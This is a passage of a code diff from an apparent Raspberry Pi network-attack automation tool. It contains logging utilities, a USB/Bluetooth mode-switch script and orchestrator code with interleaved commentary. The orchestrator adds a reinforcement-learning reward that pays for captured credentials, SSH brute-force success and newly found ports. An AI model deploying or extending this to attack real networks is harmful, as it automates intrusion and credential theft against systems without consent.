if any(word in hostname_lower for word in words):
hints.append(hint)
return hints
def _get_credentials_for_host(self, mac: str) -> List[Dict]:
"""Get credentials found for host"""
try:
return self.db.query("""
SELECT service, user, port
FROM creds
WHERE mac_address=?
""", (mac,))
except Exception:
return []
def _guess_os(self, vendor: str, ports: List[int], hostnames: List[str]) -> str:
"""Guess OS from available indicators"""
if not vendor and not ports and not hostnames:
return 'unknown'
vendor_lower = (vendor or '').lower()
port_set = set(ports or [])
hostname = hostnames[0].lower() if hostnames else ''
# Strong indicators
if 'microsoft' in vendor_lower or 3389 in port_set:
return 'windows'
if 'apple' in vendor_lower or 'mac' in hostname:
return 'macos'
if 'raspberry' in vendor_lower:
return 'linux'
# Port-based guessing
if {22, 80} <= port_set:
return 'linux'
if {135, 139, 445} <= port_set:
return 'windows'
# Hostname hints
if any(word in hostname for word in ['ubuntu', 'debian', 'centos', 'rhel']):
return 'linux'
return 'unknown'
def _is_recently_active(self, last_seen: Optional[str]) -> bool:
"""Check if host was active in last 24h"""
if not last_seen:
return False
try:
if isinstance(last_seen, str):
last_seen_dt = datetime.fromisoformat(last_seen)
elif isinstance(last_seen, datetime):
last_seen_dt = last_seen
else:
return False
hours_ago = (datetime.now() - last_seen_dt).total_seconds() / 3600
return hours_ago < 24
except (ValueError, TypeError):
return False
def _classify_action_type(self, action_name: str) -> str:
"""Classify action into high-level categories"""
action_lower = action_name.lower()
if 'brute' in action_lower or 'crack' in action_lower:
return 'bruteforce'
elif 'scan' in action_lower or 'enum' in action_lower:
return 'enumeration'
elif 'exploit' in action_lower:
return 'exploitation'
elif 'dump' in action_lower or 'extract' in action_lower:
return 'extraction'
else:
return 'other'
# ═══════════════════════════════════════════════════════════════════════
# FEATURE AGGREGATION & EXPORT
# ═══════════════════════════════════════════════════════════════════════
def get_stats(self) -> Dict[str, Any]:
"""Get current feature logging statistics"""
try:
total = self.db.query("SELECT COUNT(*) as cnt FROM ml_features")[0]['cnt']
unconsolidated = self.db.query(
"SELECT COUNT(*) as cnt FROM ml_features WHERE consolidated=0"
)[0]['cnt']
return {
'total_features_logged': total,
'unconsolidated_count': unconsolidated,
'ready_for_export': unconsolidated,
'recent_actions_buffer': len(self.recent_actions),
'hosts_tracked': len(self.host_history)
}
except Exception as e:
logger.error(f"Error getting feature stats: {e}")
return {}
# ═══════════════════════════════════════════════════════════════════════════
# END OF FILE
# ═══════════════════════════════════════════════════════════════════════════
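The similar-port-profile count in `_extract_network_features` hinges on Jaccard similarity between port sets, with a 0.5 cutoff. A minimal standalone sketch of that computation (the `port_jaccard` name is illustrative, not from the codebase):

```python
def port_jaccard(a, b):
    # Jaccard similarity: |intersection| / |union| of the two port sets.
    a, b = set(a), set(b)
    union = a | b
    return len(a & b) / len(union) if union else 0.0

# Two hosts sharing 22 and 80 out of four distinct ports sit exactly at
# the 0.5 threshold used to count "similar port profile" neighbours.
print(port_jaccard([22, 80, 443], [22, 80, 8080]))  # -> 0.5
```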

logger.py

@@ -1,87 +1,162 @@
# logger.py
import logging
import os
import threading
import time
from logging.handlers import RotatingFileHandler

SUCCESS_LEVEL_NUM = 25
logging.addLevelName(SUCCESS_LEVEL_NUM, "SUCCESS")


def success(self, message, *args, **kwargs):
    if self.isEnabledFor(SUCCESS_LEVEL_NUM):
        self._log(SUCCESS_LEVEL_NUM, message, args, **kwargs)


logging.Logger.success = success


class VerticalFilter(logging.Filter):
    def filter(self, record):
        return "Vertical" not in record.getMessage()


class Logger:
    LOGS_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), "data", "logs")
    LOG_FILE = os.path.join(LOGS_DIR, "Bjorn.log")

    _HANDLERS_LOCK = threading.Lock()
    _SHARED_CONSOLE_HANDLER = None
    _SHARED_FILE_HANDLER = None

    @classmethod
    def _ensure_shared_handlers(cls, enable_file_logging: bool):
        """
        Create shared handlers once.
        Why: every action instantiates Logger(name=...), which used to create a new
        RotatingFileHandler per logger name, leaking file descriptors (Bjorn.log opened N times).
        """
        with cls._HANDLERS_LOCK:
            if cls._SHARED_CONSOLE_HANDLER is None:
                h = logging.StreamHandler()
                # Do not filter by handler level; per-logger level controls output.
                h.setLevel(logging.NOTSET)
                h.setFormatter(
                    logging.Formatter(
                        "%(asctime)s - %(name)s - %(levelname)s - %(message)s",
                        datefmt="%Y-%m-%d %H:%M:%S",
                    )
                )
                h.addFilter(VerticalFilter())
                cls._SHARED_CONSOLE_HANDLER = h
            if enable_file_logging and cls._SHARED_FILE_HANDLER is None:
                os.makedirs(cls.LOGS_DIR, exist_ok=True)
                h = RotatingFileHandler(
                    cls.LOG_FILE,
                    maxBytes=5 * 1024 * 1024,
                    backupCount=2,
                )
                h.setLevel(logging.NOTSET)
                h.setFormatter(
                    logging.Formatter(
                        "%(asctime)s - %(name)s - %(levelname)s - %(message)s",
                        datefmt="%Y-%m-%d %H:%M:%S",
                    )
                )
                h.addFilter(VerticalFilter())
                cls._SHARED_FILE_HANDLER = h
            handlers = [cls._SHARED_CONSOLE_HANDLER]
            if enable_file_logging and cls._SHARED_FILE_HANDLER is not None:
                handlers.append(cls._SHARED_FILE_HANDLER)
            return handlers

    # Max entries before automatic purge of stale throttle keys
    _THROTTLE_MAX_KEYS = 200
    _THROTTLE_PURGE_AGE = 600.0  # Remove keys older than 10 minutes

    def __init__(self, name="Logger", level=logging.DEBUG, enable_file_logging=True):
        self.logger = logging.getLogger(name)
        self.logger.setLevel(level)
        self.logger.propagate = False
        self.enable_file_logging = enable_file_logging
        self._throttle_lock = threading.Lock()
        self._throttle_state = {}
        self._throttle_last_purge = 0.0
        # Attach shared handlers (singleton) to avoid leaking file descriptors.
        for h in self._ensure_shared_handlers(self.enable_file_logging):
            if h not in self.logger.handlers:
                self.logger.addHandler(h)

    def set_level(self, level):
        self.logger.setLevel(level)
        for handler in self.logger.handlers:
            handler.setLevel(level)

    def debug(self, msg, *args, **kwargs):
        self.logger.debug(msg, *args, **kwargs)

    def info(self, msg, *args, **kwargs):
        self.logger.info(msg, *args, **kwargs)

    def warning(self, msg, *args, **kwargs):
        self.logger.warning(msg, *args, **kwargs)

    def error(self, msg, *args, **kwargs):
        self.logger.error(msg, *args, **kwargs)

    def critical(self, msg, *args, **kwargs):
        self.logger.critical(msg, *args, **kwargs)

    def success(self, msg, *args, **kwargs):
        self.logger.success(msg, *args, **kwargs)

    def info_throttled(self, msg, key=None, interval_s=60.0):
        self._log_throttled(logging.INFO, msg, key=key, interval_s=interval_s)

    def warning_throttled(self, msg, key=None, interval_s=60.0):
        self._log_throttled(logging.WARNING, msg, key=key, interval_s=interval_s)

    def error_throttled(self, msg, key=None, interval_s=60.0):
        self._log_throttled(logging.ERROR, msg, key=key, interval_s=interval_s)

    def _log_throttled(self, level, msg, key=None, interval_s=60.0):
        throttle_key = key or f"{level}:{msg}"
        now = time.monotonic()
        with self._throttle_lock:
            last = self._throttle_state.get(throttle_key, 0.0)
            if (now - last) < max(0.0, float(interval_s)):
                return
            self._throttle_state[throttle_key] = now
            # Periodic purge of stale keys to prevent unbounded growth
            if len(self._throttle_state) > self._THROTTLE_MAX_KEYS and (now - self._throttle_last_purge) > 60.0:
                self._throttle_last_purge = now
                stale = [k for k, v in self._throttle_state.items() if (now - v) > self._THROTTLE_PURGE_AGE]
                for k in stale:
                    del self._throttle_state[k]
        self.logger.log(level, msg)

    def disable_logging(self):
        logging.disable(logging.CRITICAL)


if __name__ == "__main__":
    log = Logger(name="MyLogger", level=logging.DEBUG, enable_file_logging=False)
    log.debug("This is a debug message")
    log.info("This is an info message")
    log.warning("This is a warning message")
    log.error("This is an error message")
    log.critical("This is a critical message")
    log.success("This is a success message")
    log.set_level(logging.WARNING)
    log.debug("This debug message should not appear")
    log.info("This info message should not appear")
    log.warning("This warning message should appear")
    log.disable_logging()
    log.error("This error message should not appear")
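The `*_throttled` methods above rate-limit repeated messages per key against a monotonic clock. A self-contained sketch of the same idea, with an injectable `now` so the behavior is easy to see (the `Throttle` class is illustrative, not part of logger.py):

```python
import time

class Throttle:
    """Allow an event keyed by `key` at most once per `interval_s` seconds."""
    def __init__(self):
        self._state = {}

    def allow(self, key, interval_s=60.0, now=None):
        now = time.monotonic() if now is None else now
        last = self._state.get(key, 0.0)
        if (now - last) < max(0.0, float(interval_s)):
            return False  # still inside the throttle window
        self._state[key] = now
        return True

t = Throttle()
print(t.allow("k", 5.0, now=100.0))  # True  (first occurrence)
print(t.allow("k", 5.0, now=102.0))  # False (only 2s elapsed)
print(t.allow("k", 5.0, now=106.0))  # True  (window elapsed)
```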

mode-switcher.sh Normal file

@@ -0,0 +1,302 @@
#!/bin/bash
# Colors for menu
RED='\033[0;31m'
GREEN='\033[0;32m'
BLUE='\033[0;34m'
NC='\033[0m' # No Color
# Function to show help
show_help() {
echo "Usage: $0 [OPTION]"
echo "Manage USB Gadget and Bluetooth modes on Raspberry Pi"
echo
echo "Options:"
echo " -h, --help Show this help message"
echo " -bluetooth Enable Bluetooth mode"
echo " -usb Enable USB Gadget mode"
echo " -status Show current status"
echo
echo "Without options, the script runs in interactive menu mode"
exit 0
}
# Add notice about reboot after USB functions
notify_reboot() {
echo -e "${BLUE}Important:${NC} A reboot is required for the USB interface to appear on the host system (Windows/Mac/Linux)"
echo -e "${BLUE}Please run:${NC} sudo reboot"
}
# Function to enable USB Gadget mode
enable_usb() {
echo -e "${BLUE}Enabling USB Gadget mode...${NC}"
# Stop bluetooth and related services
echo "Stopping Bluetooth services..."
sudo systemctl stop auto_bt_connect
sudo systemctl disable auto_bt_connect
sudo systemctl stop bluetooth
sudo systemctl disable bluetooth
sleep 2
# Kill any existing processes that might interfere
echo "Cleaning up processes..."
sudo killall -9 dnsmasq 2>/dev/null || true
# Stop all related services
echo "Stopping all related services..."
sudo systemctl stop usb-gadget
sudo systemctl stop dnsmasq
sudo systemctl stop systemd-networkd
# Remove any existing network configuration
echo "Cleaning up network configuration..."
sudo ip link set usb0 down 2>/dev/null || true
sudo ip addr flush dev usb0 2>/dev/null || true
# Aggressive cleanup of USB modules
echo "Unloading USB modules..."
modules="g_ether usb_f_ecm usb_f_rndis u_ether libcomposite dwc2"
for module in $modules; do
sudo rmmod "$module" 2>/dev/null || true
done
sleep 2
# Clean up USB gadget configuration
if [ -d "/sys/kernel/config/usb_gadget/g1" ]; then
echo "Removing existing gadget configuration..."
cd /sys/kernel/config/usb_gadget/g1 || return 1
echo "" > UDC 2>/dev/null || true
rm -f configs/c.1/ecm.usb0 2>/dev/null || true
cd ..
rmdir g1 2>/dev/null || true
fi
# Reset USB controller
echo "Resetting USB controller..."
if [ -e "/sys/bus/platform/drivers/dwc2" ]; then
if [ -e "/sys/bus/platform/drivers/dwc2/20980000.usb" ]; then
echo "20980000.usb" | sudo tee /sys/bus/platform/drivers/dwc2/unbind 2>/dev/null || true
sleep 2
fi
echo "20980000.usb" | sudo tee /sys/bus/platform/drivers/dwc2/bind 2>/dev/null || true
sleep 2
fi
# Load modules in correct order with verification
echo "Loading USB modules..."
sudo modprobe dwc2
sleep 2
if ! lsmod | grep -q "^dwc2"; then
echo -e "${RED}Error: Could not load dwc2${NC}"
return 1
fi
sudo modprobe libcomposite
sleep 2
if ! lsmod | grep -q "^libcomposite"; then
echo -e "${RED}Error: Could not load libcomposite${NC}"
return 1
fi
# Start services in correct order
echo "Starting network services..."
sudo systemctl start systemd-networkd
sleep 2
echo "Starting USB gadget service..."
sudo systemctl enable usb-gadget
sudo systemctl restart usb-gadget
sleep 5
# Verify USB gadget configuration
echo "Verifying USB gadget configuration..."
if ! ip link show usb0 >/dev/null 2>&1; then
echo -e "${RED}USB Gadget interface (usb0) not found. Checking logs...${NC}"
sudo journalctl -xe --no-pager -n 50 -u usb-gadget
return 1
fi
if ! ip link show usb0 | grep -q "UP"; then
echo -e "${RED}USB Gadget interface exists but is not UP. Attempting to bring it up...${NC}"
sudo ip link set usb0 up
sleep 2
if ! ip link show usb0 | grep -q "UP"; then
echo -e "${RED}Failed to bring up USB interface${NC}"
return 1
fi
fi
echo -e "${GREEN}USB Gadget interface is up and running${NC}"
# Wait for interface with timeout
echo "Waiting for USB interface..."
for i in {1..15}; do
if ip link show usb0 > /dev/null 2>&1; then
echo "USB interface detected"
sudo ip link set usb0 up
sudo ip addr add 172.20.2.1/24 dev usb0 2>/dev/null || true
break
fi
echo "Attempt $i/15..."
sleep 1
done
if ip link show usb0 > /dev/null 2>&1; then
echo "Starting DHCP server..."
sudo systemctl restart dnsmasq
echo -e "${GREEN}USB Gadget mode successfully enabled${NC}"
ip a | grep usb0
else
echo -e "${RED}Failed to create USB interface${NC}"
return 1
fi
}
# Function to enable Bluetooth mode
enable_bluetooth() {
echo -e "${BLUE}Enabling Bluetooth mode...${NC}"
# Stop USB gadget
echo "Stopping USB gadget..."
sudo systemctl stop usb-gadget
sudo systemctl disable usb-gadget
# Aggressive cleanup of modules
echo "Cleaning up modules..."
modules="g_ether usb_f_ecm usb_f_rndis u_ether libcomposite dwc2"
for module in $modules; do
sudo rmmod "$module" 2>/dev/null || true
done
sleep 2
# Force USB reconnect if possible
if [ -e "/sys/bus/platform/drivers/dwc2" ]; then
echo "Resetting USB controller..."
echo "20980000.usb" | sudo tee /sys/bus/platform/drivers/dwc2/unbind 2>/dev/null || true
sleep 2
echo "20980000.usb" | sudo tee /sys/bus/platform/drivers/dwc2/bind 2>/dev/null || true
sleep 2
fi
# Enable and start Bluetooth
echo "Starting Bluetooth..."
sudo systemctl enable bluetooth
sudo systemctl start bluetooth
# Wait for Bluetooth to initialize
sleep 3
# Start auto_bt_connect service last
echo "Starting auto_bt_connect service..."
sudo systemctl enable auto_bt_connect
sudo systemctl start auto_bt_connect
# Status check
if systemctl is-active --quiet bluetooth; then
echo -e "${GREEN}Bluetooth mode successfully enabled${NC}"
echo "Bluetooth status:"
sudo hciconfig
if systemctl is-active --quiet auto_bt_connect; then
echo -e "${GREEN}Auto BT Connect service is running${NC}"
else
echo -e "${RED}Warning: auto_bt_connect service failed to start${NC}"
fi
else
echo -e "${RED}Error while enabling Bluetooth mode${NC}"
echo "Service logs:"
sudo systemctl status bluetooth
return 1
fi
}
# Function to show current status
show_status() {
echo -e "${BLUE}Current services status:${NC}"
echo "----------------------------------------"
echo -n "USB Gadget: "
if ip link show usb0 >/dev/null 2>&1 && ip link show usb0 | grep -q "UP"; then
echo -e "${GREEN}ACTIVE${NC}"
else
echo -e "${RED}INACTIVE${NC}"
fi
echo -n "Bluetooth: "
if systemctl is-active --quiet bluetooth; then
echo -e "${GREEN}ACTIVE${NC}"
else
echo -e "${RED}INACTIVE${NC}"
fi
echo -n "Auto BT Connect: "
if systemctl is-active --quiet auto_bt_connect; then
echo -e "${GREEN}ACTIVE${NC}"
else
echo -e "${RED}INACTIVE${NC}"
fi
echo "----------------------------------------"
}
# Parse command line arguments
if [ $# -gt 0 ]; then
case "$1" in
-h|--help)
show_help
;;
-bluetooth)
enable_bluetooth
exit 0
;;
-usb)
enable_usb
notify_reboot
exit 0
;;
-status)
show_status
exit 0
;;
*)
echo -e "${RED}Unknown option: $1${NC}"
show_help
;;
esac
fi
# Main menu (only shown if no arguments provided)
while true; do
clear
echo -e "${BLUE}=== USB/Bluetooth Mode Manager ===${NC}"
echo "1. Enable USB Gadget mode"
echo "2. Enable Bluetooth mode"
echo "3. Show status"
echo "4. Exit"
echo
show_status
echo
read -p "Choose an option (1-4): " choice
case $choice in
1)
enable_usb
notify_reboot
read -p "Press Enter to continue..."
;;
2)
enable_bluetooth
read -p "Press Enter to continue..."
;;
3)
show_status
read -p "Press Enter to continue..."
;;
4)
echo "Goodbye!"
exit 0
;;
*)
echo -e "${RED}Invalid option${NC}"
read -p "Press Enter to continue..."
;;
esac
done
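show_status() repeats one pattern: run a probe command, then print ACTIVE or INACTIVE based on its exit code. A portable sketch of that pattern (the `check` helper is illustrative, not part of the script):

```shell
#!/bin/sh
# check LABEL CMD [ARGS...]: run CMD silently, report ACTIVE on exit 0,
# INACTIVE otherwise -- the same shape as each probe in show_status().
check() {
    label="$1"; shift
    if "$@" >/dev/null 2>&1; then
        echo "$label: ACTIVE"
    else
        echo "$label: INACTIVE"
    fi
}

check "shell" true      # prints "shell: ACTIVE"
check "missing" false   # prints "missing: INACTIVE"
```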


@@ -12,6 +12,9 @@ from typing import Any, Dict, List, Optional
from init_shared import shared_data
from logger import Logger
from action_scheduler import ActionScheduler
from ai_engine import get_or_create_ai_engine, invalidate_ai_engine
from feature_logger import FeatureLogger
from data_consolidator import DataConsolidator
logger = Logger(name="orchestrator.py", level=logging.DEBUG)
@@ -25,10 +28,117 @@ class Orchestrator:
self.network_scanner = None
self.scheduler = None
self.scheduler_thread = None
self._loop_error_backoff = 1.0
# ┌─────────────────────────────────────────────────────────┐
# │ AI / Feature-logging Components │
# └─────────────────────────────────────────────────────────┘
# feature_logger runs in AUTO and AI mode to collect training data
# from ALL automated executions.
# ai_engine + data_consolidator run only in AI mode.
self.ai_engine = None
self.data_consolidator = None
self.ai_enabled = bool(self.shared_data.operation_mode == "AI")
self._ai_server_failure_streak = 0
# FeatureLogger: active as long as the orchestrator runs (AUTO or AI)
self.feature_logger = None
if self.shared_data.operation_mode in ("AUTO", "AI"):
try:
self.feature_logger = FeatureLogger(self.shared_data)
logger.info("FeatureLogger initialized (data collection active)")
except Exception as e:
logger.info_throttled(
f"FeatureLogger unavailable; execution data will not be logged: {e}",
key="orch_feature_logger_init_failed",
interval_s=300.0,
)
self.feature_logger = None
if self.ai_enabled:
try:
self.ai_engine = get_or_create_ai_engine(self.shared_data)
self.data_consolidator = DataConsolidator(self.shared_data)
logger.info("AI engine + DataConsolidator initialized (AI mode)")
except Exception as e:
logger.info_throttled(
f"AI mode active but AI components unavailable; continuing heuristic-only: {e}",
key="orch_ai_init_failed",
interval_s=300.0,
)
self.ai_engine = None
self.data_consolidator = None
self.ai_enabled = False
# Load all available actions
self.load_actions()
logger.info(f"Actions loaded: {list(self.actions.keys())}")
def _is_enabled_value(self, value: Any) -> bool:
"""Robust parser for b_enabled values coming from DB."""
if value is None:
return True
if isinstance(value, bool):
return value
if isinstance(value, (int, float)):
return int(value) == 1
s = str(value).strip().lower()
if s in {"1", "true", "yes", "on"}:
return True
if s in {"0", "false", "no", "off"}:
return False
try:
return int(float(s)) == 1
except Exception:
return True
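The tolerant flag parsing above fails open on unrecognized values. A stand-alone sketch (a module-level function purely for illustration; the real code is an Orchestrator method) shows the behavior on the value shapes SQLite can hand back:

```python
def is_enabled_value(value) -> bool:
    """Parse a DB b_enabled value; unknown or absent values default to enabled."""
    if value is None:
        return True
    if isinstance(value, bool):
        return value
    if isinstance(value, (int, float)):
        return int(value) == 1
    s = str(value).strip().lower()
    if s in {"1", "true", "yes", "on"}:
        return True
    if s in {"0", "false", "no", "off"}:
        return False
    try:
        # Numeric strings like "1.0" still count as enabled/disabled
        return int(float(s)) == 1
    except ValueError:
        return True  # fail open: unparseable strings count as enabled

# SQLite columns can yield ints, floats, or free-form text flags.
print(is_enabled_value("YES"), is_enabled_value(0.0), is_enabled_value("garbage"))
# True False True
```

Failing open matches the guard-rail use: a malformed `b_enabled` should never silently cancel a queued action.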
def _is_action_eligible_for_ai_learning(self, action_name: str) -> bool:
"""Exclude control-plane actions from AI training/reward."""
return str(action_name) not in {"NetworkScanner"}
def _update_ai_server_health(self, contact_events: List[bool]) -> None:
"""
Update consecutive AI server failure counter and fallback to AUTO when needed.
`contact_events` contains one bool per attempted contact in this cycle.
"""
if not contact_events:
return
contacted_ok = any(contact_events)
if contacted_ok:
if self._ai_server_failure_streak > 0:
logger.info("AI server contact recovered; reset failure streak")
self._ai_server_failure_streak = 0
return
self._ai_server_failure_streak += 1
max_failures = max(
1,
int(getattr(self.shared_data, "ai_server_max_failures_before_auto", 3)),
)
model_loaded = bool(getattr(self.ai_engine, "model_loaded", False))
if self.shared_data.operation_mode == "AI" and (not model_loaded):
remaining_cycles = max(0, max_failures - self._ai_server_failure_streak)
if remaining_cycles > 0:
logger.info_throttled(
f"AI server unreachable ({self._ai_server_failure_streak}/{max_failures}) and no local model loaded; "
f"AUTO fallback in {remaining_cycles} cycle(s) if server remains offline",
key="orch_ai_unreachable_no_model_pre_fallback",
interval_s=60.0,
)
if (
self.shared_data.operation_mode == "AI"
and self._ai_server_failure_streak >= max_failures
and (not model_loaded)
):
logger.warning(
f"AI server unreachable for {self._ai_server_failure_streak} consecutive cycles and no local AI model is loaded; "
"switching operation mode to AUTO (heuristics-only)"
)
self.shared_data.operation_mode = "AUTO"
self._disable_ai_components()
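The AUTO-fallback logic above is easiest to reason about as a tiny state machine. This toy model (class and field names are illustrative, not part of the codebase) reproduces the counting rules: an empty cycle is neutral, one successful contact resets the streak, and the mode flips only when the streak reaches the limit with no local model loaded:

```python
class FallbackGuard:
    """Toy model of AI-server health tracking: after N consecutive cycles
    with no successful contact and no local model, fall back to AUTO."""

    def __init__(self, max_failures=3):
        self.max_failures = max_failures
        self.streak = 0
        self.mode = "AI"
        self.model_loaded = False

    def update(self, contact_events):
        if not contact_events:
            return  # nothing attempted this cycle; streak unchanged
        if any(contact_events):
            self.streak = 0  # one success resets the counter
            return
        self.streak += 1
        if self.mode == "AI" and self.streak >= self.max_failures and not self.model_loaded:
            self.mode = "AUTO"

g = FallbackGuard()
for _ in range(3):
    g.update([False])  # three silent cycles in a row
print(g.mode)          # AUTO
```

Note that a loaded local model suppresses the fallback entirely: the device keeps running AI-mode inference offline and only the server sync degrades.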
def load_actions(self):
"""Load all actions from database"""
@@ -64,9 +174,82 @@ class Orchestrator:
except Exception as e:
logger.error(f"Failed to load action {b_class}: {e}")
# ----------------------------------------------------------------- AI mode
def _ensure_feature_logger(self) -> None:
"""Init FeatureLogger if not yet running (called when entering AUTO or AI mode)."""
if self.feature_logger is not None:
return
try:
self.feature_logger = FeatureLogger(self.shared_data)
logger.info("FeatureLogger enabled")
except Exception as e:
logger.info_throttled(
f"FeatureLogger unavailable: {e}",
key="orch_feature_logger_enable_failed",
interval_s=300.0,
)
def _enable_ai_components(self) -> None:
"""Lazy-init AI-specific helpers when switching to AI mode at runtime."""
self._ensure_feature_logger()
if self.ai_engine and self.data_consolidator:
self.ai_enabled = True
return
try:
self.ai_engine = get_or_create_ai_engine(self.shared_data)
self.data_consolidator = DataConsolidator(self.shared_data)
self.ai_enabled = True
if self.ai_engine and not bool(getattr(self.ai_engine, "model_loaded", False)):
logger.warning(
"AI mode active but no local model loaded yet; "
"will fallback to AUTO if server stays unreachable"
)
logger.info("AI engine + DataConsolidator enabled")
except Exception as e:
self.ai_engine = None
self.data_consolidator = None
self.ai_enabled = False
logger.info_throttled(
f"AI components not available; staying heuristic-only: {e}",
key="orch_ai_enable_failed",
interval_s=300.0,
)
def _disable_ai_components(self) -> None:
"""Drop AI-specific helpers when leaving AI mode.
FeatureLogger is kept alive so AUTO mode still collects data."""
self.ai_enabled = False
self.ai_engine = None
self.data_consolidator = None
# Release cached AI engine singleton so model weights can be freed in AUTO mode.
try:
invalidate_ai_engine(self.shared_data)
except Exception:
pass
def _sync_ai_components(self) -> None:
"""Keep runtime AI helpers aligned with shared_data.operation_mode."""
mode = self.shared_data.operation_mode
if mode == "AI":
if not self.ai_enabled:
self._enable_ai_components()
else:
if self.ai_enabled:
self._disable_ai_components()
# Ensure feature_logger is alive in AUTO mode too
if mode == "AUTO":
self._ensure_feature_logger()
def start_scheduler(self):
"""Start the scheduler in background"""
if self.scheduler_thread and self.scheduler_thread.is_alive():
logger.info("ActionScheduler thread already running")
return
logger.info("Starting ActionScheduler in background...")
self.scheduler = ActionScheduler(self.shared_data)
self.scheduler_thread = threading.Thread(
@@ -87,24 +270,227 @@ class Orchestrator:
)
return action
def _build_host_state(self, mac_address: str) -> Dict:
"""
Build RL state dict from host data in database.
Args:
mac_address: Target MAC address
Returns:
Dict with keys: mac, ports, hostname
"""
try:
# Get host from database
host = self.shared_data.db.get_host_by_mac(mac_address)
if not host:
logger.warning(f"Host not found for MAC: {mac_address}")
return {'mac': mac_address, 'ports': [], 'hostname': ''}
# Parse ports
ports_str = host.get('ports', '')
ports = []
if ports_str:
for p in ports_str.split(';'):
p = p.strip()
if p.isdigit():
ports.append(int(p))
# Get first hostname
hostnames_str = host.get('hostnames', '')
hostname = hostnames_str.split(';')[0] if hostnames_str else ''
return {
'mac': mac_address,
'ports': ports,
'hostname': hostname
}
except Exception as e:
logger.error(f"Error building host state: {e}")
return {'mac': mac_address, 'ports': [], 'hostname': ''}
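`_build_host_state` reduces a DB row to a compact RL state. The parsing convention (semicolon-separated ports and hostnames, non-numeric entries dropped, first hostname wins) can be sketched without a database; `parse_host_row` is a hypothetical helper, not a real method:

```python
def parse_host_row(mac, ports_str, hostnames_str):
    """Mirror of the state-building parse: ';'-separated ports and hostnames."""
    ports = [int(p) for p in (ports_str or "").split(";") if p.strip().isdigit()]
    hostname = (hostnames_str or "").split(";")[0]
    return {"mac": mac, "ports": ports, "hostname": hostname}

state = parse_host_row("aa:bb:cc:dd:ee:ff", "22;80; 443;abc", "printer.lan;printer")
print(state)  # ports -> [22, 80, 443] ('abc' dropped), hostname -> 'printer.lan'
```

The permissive parse matters because the `ports` column is free text written by several actions; one malformed entry should not poison the whole state vector.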
def _calculate_reward(
self,
action_name: str,
success: bool,
duration: float,
mac: str,
state_before: Dict,
state_after: Dict
) -> float:
"""
Calculate reward for RL update.
Reward structure:
- Base: +50 for success, -5 for failure (failures also pay -0.1 per second spent)
- Credentials found: +100 per credential
- New ports discovered: +15 per port
- Time bonus: +20 if <30s, -10 if >120s
- SSHBruteforce success: +30 extra
Args:
action_name: Name of action executed
success: Did action succeed?
duration: Execution time in seconds
mac: Target MAC address
state_before: State dict before action
state_after: State dict after action
Returns:
Reward value (float)
"""
if not self._is_action_eligible_for_ai_learning(action_name):
return 0.0
# Base reward
reward = 50.0 if success else -5.0
if not success:
# Penalize time waste on failure
reward -= (duration * 0.1)
return reward
# ─────────────────────────────────────────────────────────
# Check for credentials found (high value!)
# ─────────────────────────────────────────────────────────
try:
recent_creds = self.shared_data.db.query("""
SELECT COUNT(*) as cnt FROM creds
WHERE mac_address=?
AND first_seen > datetime('now', '-1 minute')
""", (mac,))
if recent_creds and recent_creds[0]['cnt'] > 0:
creds_count = recent_creds[0]['cnt']
reward += 100 * creds_count # 100 per credential!
logger.info(f"RL: +{100*creds_count} reward for {creds_count} credentials")
except Exception as e:
logger.error(f"Error checking credentials: {e}")
# ─────────────────────────────────────────────────────────
# Check for new services discovered
# ─────────────────────────────────────────────────────────
try:
# Compare ports before/after
ports_before = set(state_before.get('ports', []))
ports_after = set(state_after.get('ports', []))
new_ports = ports_after - ports_before
if new_ports:
reward += 15 * len(new_ports)
logger.info(f"RL: +{15*len(new_ports)} reward for {len(new_ports)} new ports")
except Exception as e:
logger.error(f"Error checking new ports: {e}")
# ─────────────────────────────────────────────────────────
# Time efficiency bonus/penalty
# ─────────────────────────────────────────────────────────
if duration < 30:
reward += 20 # Fast execution bonus
elif duration > 120:
reward -= 10 # Slow execution penalty
# ─────────────────────────────────────────────────────────
# Action-specific bonuses
# ─────────────────────────────────────────────────────────
if action_name == "SSHBruteforce" and success:
# Extra bonus for SSH success (difficult action)
reward += 30
logger.debug(f"RL Reward calculated: {reward:.1f} for {action_name}")
return reward
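Stripped of the DB lookups, the reward shaping above reduces to a pure function, which makes the magic numbers easy to sanity-check. `toy_reward` is an illustrative re-implementation (the credentials query is replaced by an explicit count), not the code path the orchestrator runs:

```python
def toy_reward(success, duration, new_ports=0, creds=0, ssh_success=False):
    """Stand-alone version of the RL reward shaping (no DB access)."""
    if not success:
        return -5.0 - duration * 0.1   # failure plus time-waste penalty
    reward = 50.0
    reward += 100 * creds              # credentials are the jackpot
    reward += 15 * new_ports           # each newly exposed port
    if duration < 30:
        reward += 20                   # fast-execution bonus
    elif duration > 120:
        reward -= 10                   # slow-execution penalty
    if ssh_success:
        reward += 30                   # SSHBruteforce difficulty bonus
    return reward

# A fast SSH success that found one credential and two new ports:
print(toy_reward(True, 12.0, new_ports=2, creds=1, ssh_success=True))  # 230.0
```

Keeping the shaping side-effect-free like this would also make it unit-testable; in the real method only the credentials lookup forces DB access.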
def execute_queued_action(self, queued_action: Dict[str, Any]) -> bool:
"""Execute a single queued action with RL integration"""
queue_id = queued_action['id']
action_name = queued_action['action_name']
mac = queued_action['mac_address']
ip = queued_action['ip']
port = queued_action['port']
# Parse metadata once; used throughout this function
metadata = json.loads(queued_action.get('metadata', '{}'))
source = str(metadata.get('decision_method', 'unknown'))
source_label = f"[{source.upper()}]" if source != 'unknown' else ""
decision_origin = str(metadata.get('decision_origin', 'unknown'))
ai_confidence = metadata.get('ai_confidence')
ai_threshold = metadata.get('ai_threshold', getattr(self.shared_data, "ai_confirm_threshold", 0.3))
ai_reason = str(metadata.get('ai_reason', 'n/a'))
ai_method = metadata.get('ai_method')
if not ai_method:
ai_method = (metadata.get('ai_debug') or {}).get('method')
ai_method = str(ai_method or 'n/a')
ai_model_loaded = bool(metadata.get('ai_model_loaded', bool(getattr(self.ai_engine, "model_loaded", False)) if self.ai_engine else False))
decision_scope = str(metadata.get('decision_scope', 'unknown'))
exec_payload = {
"action": action_name,
"target": ip,
"port": port,
"decision_method": source,
"decision_origin": decision_origin,
"decision_scope": decision_scope,
"ai_method": ai_method,
"ai_confidence": ai_confidence if isinstance(ai_confidence, (int, float)) else None,
"ai_threshold": ai_threshold if isinstance(ai_threshold, (int, float)) else None,
"ai_model_loaded": ai_model_loaded,
"ai_reason": ai_reason,
}
logger.info(f"Executing {source_label}: {action_name} for {ip}:{port}")
logger.info(f"[DECISION_EXEC] {json.dumps(exec_payload)}")
# Guard rail: stale queue rows can exist for disabled or not-loaded actions.
try:
